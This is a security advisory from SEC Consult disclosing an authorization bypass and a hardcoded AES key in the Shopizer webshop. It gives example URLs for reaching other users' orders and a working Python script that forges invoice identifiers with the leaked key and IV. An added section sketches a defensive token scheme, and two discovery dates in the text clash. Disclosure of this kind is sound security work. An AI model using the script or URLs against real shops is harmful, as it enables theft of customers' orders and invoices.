SEC Consult SA-20140710-1 :: Multiple high risk vulnerabilities
SEC Consult Vulnerability Lab Security Advisory < 20140710-1 >
========================================================================
title: Multiple high risk vulnerabilities in Shopizer webshop
product: Shopizer
vulnerable version: 1.1.5 and below
fixed version: v2 (new codebase)
impact: high
homepage: http://www.shopizer.com/
found: 2012-09-04
by: K. Gudinavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
========================================================================
Vendor description:
-------------------
Shopizer is an open source Java shopping cart and e-commerce content
management software (CMS). The system is built on Struts 2, Hibernate and
Spring. jQuery UI and AJAX are heavily used on the UI, as well as DWR and the
Struts2-jQuery plug-in. (http://www.shopizer.com/)
Vulnerability overview/description:
-----------------------------------
Shopizer is prone to the following high risk vulnerabilities:
1) Authentication/authorization bypass
The authentication and authorization mechanism provided by the web application
is prone to an authentication/authorization bypass vulnerability, which can be
easily exploited by remote attackers to gain access to private
information. Malicious actions can be performed by directly calling internal
methods which are supposed to be accessible only to authenticated and permitted
users.
2) Hardcoded default encryption key
A default encryption key is used across all versions of Shopizer. It can't
be changed, for example by editing a configuration file, because it is
hardcoded in the source code of the web application. The default encryption
key can be used to encrypt special values allowing access to sensitive
information.
Proof of concept:
-----------------
1) Authentication/authorization bypass
The viewFiles method is vulnerable to authentication bypass. By changing the
value of the orderId parameter (e.g. by incrementing it) it is possible to
access and download ordered files of other users. This means that a malicious
user can completely bypass the checkout process and does not even need an
account in order to gain access to the data that is sold on the target
website. In the following example the files of the order with the ID 61 will be
accessed.
/shop/checkout/viewFiles.action?orderId=61
The removeReview method is vulnerable to authorization bypass. An
authenticated user can remove arbitrary product reviews by changing the value
of the reviewId parameter (e.g. by incrementing it). The following URL will
remove the product review with the ID 398.
/shop/profile/removeReview.action?reviewId=398
2) Hardcoded default encryption key
The hardcoded default encryption key is 1000000000000000
(SecurityConstants.java) and the default initialization vector is
fedcba9876543210 (EncryptionUtil.java). Both values were extracted from the
publicly available versions of Shopizer. The following is the source code
of a Python script that can be used to decrypt and encrypt arbitrary values by
using the extracted keys.
from Crypto.Cipher import AES
from binascii import unhexlify, hexlify
import sys

KEY = b'1000000000000000'   # hardcoded default key (SecurityConstants.java)
IV = b'fedcba9876543210'    # static initialization vector (EncryptionUtil.java)
mode = AES.MODE_CBC
size = AES.block_size

def pad(s):
    # PKCS#5 padding up to a multiple of the AES block size
    n = size - len(s) % size
    return s + bytes([n]) * n

def decrypt(ciphertext):
    # ciphertext is the hex string used in the application's URLs
    ciphertext = unhexlify(ciphertext)
    decryptor = AES.new(KEY, mode, IV)
    plain = decryptor.decrypt(ciphertext)
    print(repr(plain))

def encrypt(plaintext):
    sample = pad(plaintext.encode())
    encryptor = AES.new(KEY, mode, IV)
    cipher = encryptor.encrypt(sample)
    print(hexlify(cipher).decode())

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("Usage: %s encrypt|decrypt text" % sys.argv[0])
        sys.exit(1)
    elif sys.argv[1] == 'decrypt':
        decrypt(sys.argv[2])
    elif sys.argv[1] == 'encrypt':
        encrypt(sys.argv[2])
The tool can be used to gain access to the invoices of other users. The
prepareSimpleInvoice action takes the encrypted value of the order number, which
is incremental. For example, to gain access to the invoice of order 57 the
string 57|0 must be encrypted:
C:\>python aes.py encrypt "57|0"
0664567580f32d3398a981cf51285057
The encrypted string is then used as the value of the fileId parameter of the
following URL:
/shop/cart/prepareSimpleInvoice.action?fileId=0664567580f32d3398a981cf51285057
Other parts of the web application such as passwords and ordered files also
depend on the same encryption keys. If an attacker is able to gain access to
the database where encrypted user credentials are stored, he can easily
decrypt them and use them in further attacks.
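Added example (not part of the advisory and not Shopizer's code): a defensive sketch of how an order or invoice reference can be issued so that neither incrementing an orderId nor re-encrypting a guessed order number yields a usable value. The token carries the order id and the owning account, is protected by an HMAC whose key comes from the environment rather than the source (the variable name SHOP_TOKEN_KEY is an assumption), and the server re-checks that the presenting session belongs to the owner.

```python
import base64
import hashlib
import hmac
import os
import secrets

# The key comes from deployment configuration, not from the source tree.
# SHOP_TOKEN_KEY is a hypothetical variable name chosen for this example;
# the random fallback only exists so that the script runs offline.
KEY = os.environ.get("SHOP_TOKEN_KEY", "").encode() or secrets.token_bytes(32)
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def issue_token(order_id: int, account_id: int, key: bytes = KEY) -> str:
    """Reference an order by an HMAC-protected token bound to its owner.

    A fresh nonce makes two tokens for the same order differ, so a token
    cannot be recomputed for a guessed order number the way a fixed-key,
    fixed-IV AES-CBC value can.
    """
    nonce = secrets.token_hex(8)
    payload = f"{order_id}|{account_id}|{nonce}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload + tag).decode()


def resolve_order(token: str, session_account_id: int, key: bytes = KEY):
    """Return the order id, or None if the token is forged or not the caller's."""
    try:
        raw = base64.urlsafe_b64decode(token.encode())
        payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
        order_s, account_s, _nonce = payload.decode().split("|")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed token
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # payload edited or issued under another key
    if int(account_s) != session_account_id:
        return None  # genuine token, but presented by a different account
    return int(order_s)


if __name__ == "__main__":
    token = issue_token(57, 1001)
    print(resolve_order(token, 1001))  # 57
    print(resolve_order(token, 1002))  # None
```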
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 1.1.5 of Shopizer,
which is the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2012-01-10: The vulnerabilities have been found during a short blackbox test
of a Shopizer installation during a customer project
2012-12-20: Customer allows contacting vendor
2013-01-10: Contacting vendor through support@shopizer.com, fast reply,
sending advisory
2013-01-22: Asking for status update, reply: vendor takes a look
2013-02-26: Asking for status update, vendor has some questions regarding
version numbers
2013-03-22: Asking for status update again
2013-03-23: Vendor: Release 2 is scheduled for June
2013-06-25: Asking for status update, no answer
2013-07-01: Sending deadline for advisory release
2013-07-07: Vendor: Version 2 of shopizer delayed
2013-07-08: Asking for new release date
2013-07-09: Vendor: moving from Struts to Spring & Spring security
2013-10-03: Asking again for release date
2013-10-06: Vendor: Release shortly
2013-12-10: Asking for update
2013-12-12: Vendor: Release date set for January 2014
2014-06: Vendor releases v2
2014-07-10: SEC Consult releases security advisory
Solution:
---------
Using the old version branch 1.x is not recommended as there are no security
fixes implemented by the vendor.
Version 2 has been released by the vendor, but it has not been tested by SEC Consult
and it is unclear whether the issues have been solved.
Workaround:
-----------
-
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF K. Gudinavicius / @2012, 2013, 2014